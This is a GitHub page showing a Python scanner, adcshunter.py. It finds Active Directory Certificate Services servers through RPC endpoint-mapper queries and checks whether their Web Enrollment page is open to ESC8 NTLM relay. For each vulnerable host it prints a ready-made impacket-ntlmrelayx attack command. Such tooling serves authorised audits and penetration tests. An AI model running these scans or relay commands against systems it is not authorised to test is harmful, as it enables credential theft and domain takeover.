-
Notifications
You must be signed in to change notification settings - Fork 7
/
adcshunter.py
255 lines (218 loc) · 9.03 KB
/
adcshunter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
import argparse
import threading
import queue
import ipaddress
import os
import requests
import logging
import socket
from impacket import uuid
from impacket.dcerpc.v5 import transport, epm
# --- Process-wide side effects -------------------------------------------
# Every socket created without an explicit timeout gives up after 5 seconds.
socket.setdefaulttimeout(5)
# Root logger only lets CRITICAL records through, silencing library chatter.
logging.basicConfig(level=logging.CRITICAL)

# --- Terminal colours (ANSI escape sequences) ----------------------------
RED, RESET = '\033[91m', '\033[0m'

# --- State shared between worker threads ---------------------------------
# Targets confirmed vulnerable; guarded by vulnerable_targets_lock.
vulnerable_targets = []
vulnerable_targets_lock = threading.Lock()
# Serialises writes to stdout so per-target output is not interleaved.
print_lock = threading.Lock()
def make_http_request(ip):
    """Probe the certificate Web Enrollment page on *ip* over plain HTTP.

    Issues a GET for ``http://<ip>/certsrv/certfnsh.asp`` with a 5 second
    timeout.

    Args:
        ip: IP address or hostname placed verbatim into the URL.

    Returns:
        A two-element tuple ``(flag, None)``. ``flag`` is True only when the
        reply has status 401 and its body contains "Access is denied"; any
        other reply, or any ``requests.RequestException``, yields False. The
        second element is always None.
    """
    endpoint = f"http://{ip}/certsrv/certfnsh.asp"
    try:
        reply = requests.get(endpoint, timeout=5)
        # Body is only inspected when the status code already matches.
        denied = reply.status_code == 401 and "Access is denied" in reply.text
    except requests.RequestException:
        denied = False
    return denied, None
def parse_input_line(line):
    """Expand one line of user input into a list of scan targets.

    Args:
        line: Raw text; surrounding whitespace is ignored.

    Returns:
        ``[]`` for a blank line; every address of the network (as strings)
        when the text parses as CIDR notation (host bits are tolerated);
        otherwise a single-element list holding the stripped text, whether it
        is a literal IP address or something else such as a hostname.
    """
    target = line.strip()
    if target == "":
        return []

    try:
        if '/' not in target:
            # Validation only: a literal address and a hostname are both
            # returned unchanged, so the parsed value itself is not needed.
            ipaddress.ip_address(target)
            return [target]
        network = ipaddress.ip_network(target, strict=False)
        return list(map(str, network))
    except ValueError:
        # Neither an address nor a network: treat the text as a hostname.
        return [target]
class RPCDump:
    """Query a remote RPC endpoint mapper and return its registered entries."""

    # String-binding templates keyed by destination port; ``%s`` receives the
    # remote name passed to dump().
    KNOWN_PROTOCOLS = {
        135: {'bindstr': r'ncacn_ip_tcp:%s[135]'},
        139: {'bindstr': r'ncacn_np:%s[\pipe\epmapper]'},
        443: {'bindstr': r'ncacn_http:[593,RpcProxy=%s:443]'},
        445: {'bindstr': r'ncacn_np:%s[\pipe\epmapper]'},
        593: {'bindstr': r'ncacn_http:%s'}
    }

    def __init__(self, username='', password='', domain='', hashes=None, port=135):
        """Store credentials and the port selecting the transport.

        Args:
            username: Account name (only applied for ports 139, 443 and 445).
            password: Account password.
            domain: Account domain.
            hashes: Optional ``"LMHASH:NTHASH"`` string; split on ``:``.
            port: Key into KNOWN_PROTOCOLS.
        """
        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__port = port
        self.__stringbinding = ''
        if hashes is not None:
            self.__lmhash, self.__nthash = hashes.split(':')

    def dump(self, remoteName, remoteHost):
        """Return the endpoint-mapper entries of the target, or ``[]`` on failure.

        Args:
            remoteName: Name substituted into the string binding.
            remoteHost: Host the named-pipe transport connects to (ports 139/445).

        Returns:
            Whatever the endpoint-mapper lookup returns, or an empty list when
            connecting or querying fails.

        Raises:
            KeyError: if the configured port is not in KNOWN_PROTOCOLS.
        """
        entries = []
        self.__stringbinding = self.KNOWN_PROTOCOLS[self.__port]['bindstr'] % remoteName
        rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)

        if self.__port in [139, 445]:
            rpctransport.set_credentials(self.__username, self.__password, self.__domain,
                                         self.__lmhash, self.__nthash)
            rpctransport.setRemoteHost(remoteHost)
            rpctransport.set_dport(self.__port)
        elif self.__port in [443]:
            rpctransport.set_credentials(self.__username, self.__password, self.__domain,
                                         self.__lmhash, self.__nthash)
            rpctransport.set_auth_type(transport.HTTPTransport.AUTH_NTLM)

        try:
            entries = self.__fetchList(rpctransport)
        except Exception:
            # Best effort by design: an unreachable or non-RPC host simply
            # yields no entries. Kept visible at debug level for diagnosis.
            logging.debug("Endpoint mapper query against %s failed", remoteName, exc_info=True)
        return entries

    def __fetchList(self, rpctransport):
        """Connect, run the endpoint-mapper lookup, and always disconnect.

        Exceptions from connecting or from the lookup propagate to the caller.
        """
        try:
            rpctransport.set_connect_timeout(5)  # 5 second connect timeout
        except AttributeError:
            pass  # Not all transports support this method

        dce = rpctransport.get_dce_rpc()
        try:
            dce.set_rpc_timeout(5)  # 5 second RPC timeout
        except AttributeError:
            pass  # Not all DCE/RPC connections support this method

        # connect() stays outside the try so disconnect() is only attempted on
        # a connection that was actually established.
        dce.connect()
        try:
            return epm.hept_lookup(None, dce=dce)
        finally:
            # Release the connection even when the lookup raises; a failing
            # disconnect must not discard entries that were already fetched.
            try:
                dce.disconnect()
            except Exception:
                logging.debug("Disconnect from endpoint mapper failed", exc_info=True)
def _is_certsrv_entry(entry):
    """Return True when an endpoint-mapper entry's interface maps to certsrv.exe."""
    interface = str(entry['tower']['Floors'][0])
    uuid_bin = uuid.uuidtup_to_bin(uuid.string_to_uuidtup(interface))[:18]
    exe_name = epm.KNOWN_UUIDS[uuid_bin] if uuid_bin in epm.KNOWN_UUIDS else 'N/A'
    return 'certsrv.exe' in exe_name.lower()


def worker(ip_queue, progress):
    """Thread body: scan targets taken from *ip_queue* until a None sentinel.

    For each target the RPC endpoint mapper on port 135 is queried. When one
    of the returned entries belongs to certsrv.exe, the Web Enrollment page is
    probed and vulnerable targets are appended to ``vulnerable_targets``.
    All messages for one target are printed together under ``print_lock``.

    Args:
        ip_queue: Queue of IP/hostname strings; ``None`` tells the thread to exit.
        progress: Object exposing ``get_lock()`` and an integer ``value`` that
            is incremented once per processed target.
    """
    while True:
        ip = ip_queue.get()
        if ip is None:
            ip_queue.task_done()
            break

        # Messages are buffered and emitted in one print so that output from
        # different threads does not interleave.
        output_messages = [f"Testing {ip}"]
        try:
            entries = RPCDump(port=135).dump(ip, ip)
            # Only the interface -> executable mapping matters for detection;
            # any() stops at the first certsrv.exe entry.
            if entries and any(_is_certsrv_entry(entry) for entry in entries):
                output_messages.append(f"\nADCS Server identified on {ip}")
                output_messages.append(f"Checking for ESC8 vulnerability on {ip}")
                is_vulnerable, _ = make_http_request(ip)
                if is_vulnerable:
                    output_messages.append(f"{RED}Vulnerable Web Enrollment endpoint found: http://{ip}/certsrv/certfnsh.asp{RESET}\n")
                    with vulnerable_targets_lock:
                        vulnerable_targets.append(ip)
                else:
                    output_messages.append(f"No vulnerability found on {ip}\n")
        except Exception:
            # Best effort: one misbehaving host must not kill the thread.
            # The failure stays available at debug level.
            logging.debug("Scan of %s failed", ip, exc_info=True)
        finally:
            try:
                with print_lock:
                    print('\n'.join(output_messages))
                with progress.get_lock():
                    progress.value += 1
            finally:
                # Always acknowledge the item, otherwise ip_queue.join() in the
                # coordinator would block forever.
                ip_queue.task_done()
def run_rpcdump_concurrently(ip_list, num_worker_threads=10):
    """Scan every target in *ip_list* using a pool of ``worker`` threads.

    Blocks until all targets are processed. On KeyboardInterrupt the targets
    still waiting in the queue are discarded so the threads stop after their
    current target; the interrupt itself is not re-raised.

    Args:
        ip_list: Sized collection of IP/hostname strings (each is stripped).
        num_worker_threads: Upper bound on the number of threads; never more
            threads than targets are started.
    """
    if not ip_list:
        return  # Nothing to scan; avoid spinning up idle threads.

    class Progress:
        """Counter of processed targets with the lock that guards it."""

        def __init__(self, total):
            self.value = 0
            self.total = total
            self._lock = threading.Lock()

        def get_lock(self):
            return self._lock

    ip_queue = queue.Queue()
    progress = Progress(len(ip_list))
    thread_count = max(1, min(num_worker_threads, len(ip_list)))

    threads = [
        threading.Thread(target=worker, args=(ip_queue, progress))
        for _ in range(thread_count)
    ]
    for t in threads:
        t.start()

    try:
        for ip in ip_list:
            ip_queue.put(ip.strip())
        ip_queue.join()
    except KeyboardInterrupt:
        # Drop the backlog first: sentinels queued behind pending targets
        # would only be reached after the whole scan had finished anyway.
        while True:
            try:
                ip_queue.get_nowait()
            except queue.Empty:
                break
            ip_queue.task_done()
    finally:
        # One sentinel per thread tells each worker to exit.
        for _ in threads:
            ip_queue.put(None)
        for t in threads:
            t.join()
def main():
    """Command-line entry point: parse ``--target``, scan, and print a summary.

    ``--target`` may be a path to a file with one target per line, a CIDR
    range, an IP address, or a hostname. After the scan, vulnerable targets
    are listed together with a ready-to-use ntlmrelayx command for each.
    """
    try:
        parser = argparse.ArgumentParser(description='Script to scan for vulnerable Web Enrollment endpoints.')
        parser.add_argument('-t', '--target', required=True, help='File path, CIDR range, IP address, or hostname to scan.')
        args = parser.parse_args()
        user_input = args.target

        if os.path.isfile(user_input):
            with open(user_input, 'r') as file:
                targets = [target for line in file for target in parse_input_line(line)]
        else:
            targets = parse_input_line(user_input)
            if not targets:
                print("Invalid input. Please enter a valid file path, CIDR range, IP address, or hostname.")
                # Nothing was scanned, so a "no vulnerable targets" summary
                # would be misleading.
                return

        # dict.fromkeys removes duplicates while keeping the input order, so
        # the scan and the final report are deterministic.
        ip_list = list(dict.fromkeys(targets))
        run_rpcdump_concurrently(ip_list)

        # After scanning is complete, output the command if vulnerabilities were found
        with print_lock:
            if vulnerable_targets:
                print(f"\n{RED}Vulnerable targets found:{RESET}")
                for target in vulnerable_targets:
                    print(f" - {target}")
                print("\nYou can use the following command(s):")
                for target in vulnerable_targets:
                    print(f"{RED}impacket-ntlmrelayx -t http://{target}/certsrv/certfnsh.asp -smb2support --adcs --template 'user'{RESET}")
            else:
                print("\nNo vulnerable targets were found.")
    except KeyboardInterrupt:
        print("\nOperation interrupted by user. Exiting gracefully.")


if __name__ == "__main__":
    main()